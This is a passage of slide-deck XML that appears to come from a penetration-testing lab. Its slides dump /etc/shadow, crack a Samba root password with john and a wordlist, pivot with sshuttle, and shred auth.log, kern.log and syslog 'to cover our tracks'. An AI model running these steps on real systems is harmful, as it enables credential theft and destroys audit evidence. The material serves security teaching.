      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Google Shape;595;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885425" y="1174075"/>
            <a:ext cx="3151500" cy="281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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ cat /etc/shadow</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This command outputs a list of hashes of users on the linux system. Often these users are system processes. The more interesting ones usually have a long hash string, which contain the type of hash, the salt used and the hash itself followed by some miscellaneous information denoted with colons.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="596" name="Google Shape;596;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="951975"/>
            <a:ext cx="5733024" cy="4028318"/>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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Preparing to crack the passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037825" y="1174075"/>
            <a:ext cx="2478000" cy="186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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Create a new text file using the following commands:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cd ~/Desktop &amp;&amp; touch creds.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo nano creds.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;603;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="1136"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="997850"/>
            <a:ext cx="5638925" cy="39932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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preparing to crack the passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817550" y="876700"/>
            <a:ext cx="2940600" cy="371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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Create a new text file containing a wordlist of passwords using the following command:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo nano passwords.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Note that for this exercise, we have a password of “smbvictim” and a short password list for simplicity sake. In a real corporate environment, root accounts passwords for Samba servers should be long, unique and complex.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="610" name="Google Shape;610;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="951975"/>
            <a:ext cx="2781300" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="611" name="Google Shape;611;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1733025"/>
            <a:ext cx="4972531" cy="32580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22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711925" y="72900"/>
            <a:ext cx="7720149" cy="49977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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Cracking the passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885425" y="1174075"/>
            <a:ext cx="2972100" cy="341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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can use john to crack the password and even specify a wordlist</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ john --wordlist=./passwords.txt hash.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ john --show hash.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can now use the gained credentials to attempt proxy-forwarding using sshuttle.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Google Shape;618;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="100525" y="918925"/>
            <a:ext cx="5784899" cy="35152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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Google Shape;624;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310600" y="986825"/>
            <a:ext cx="8260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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can use the shred utility to wipe any traces of logs from the disk so as to cover our tracks. The options are specified below.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449775" y="1723600"/>
            <a:ext cx="6073527" cy="30490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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310600" y="986825"/>
            <a:ext cx="8260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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We will remove auth.log, which stores login information, syslog - which contains information about of connections to the system and kern.log which contains kernel processes. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="632" name="Google Shape;632;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="970" t="2818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1845925"/>
            <a:ext cx="6656401" cy="31451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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310600" y="986825"/>
            <a:ext cx="8260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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We will first concatenate them to verify that they are populated, specifically the end to show that our activities have been registered..</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="639" name="Google Shape;639;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376675" y="1555803"/>
            <a:ext cx="6830674" cy="1666350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="640" name="Google Shape;640;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376675" y="3267850"/>
            <a:ext cx="8296323" cy="175615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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310600" y="986825"/>
            <a:ext cx="8260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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We will first concatenate them to verify that they are populated, specifically the end to show that our activities have been registered..</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;647;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1754825"/>
            <a:ext cx="8839200" cy="164833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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046550" y="799575"/>
            <a:ext cx="3789000" cy="401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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can use the shred utility to wipe any traces of logs from the disk so as to cover our tracks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ shred -vfzu auth.log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>kern.log sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>log </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
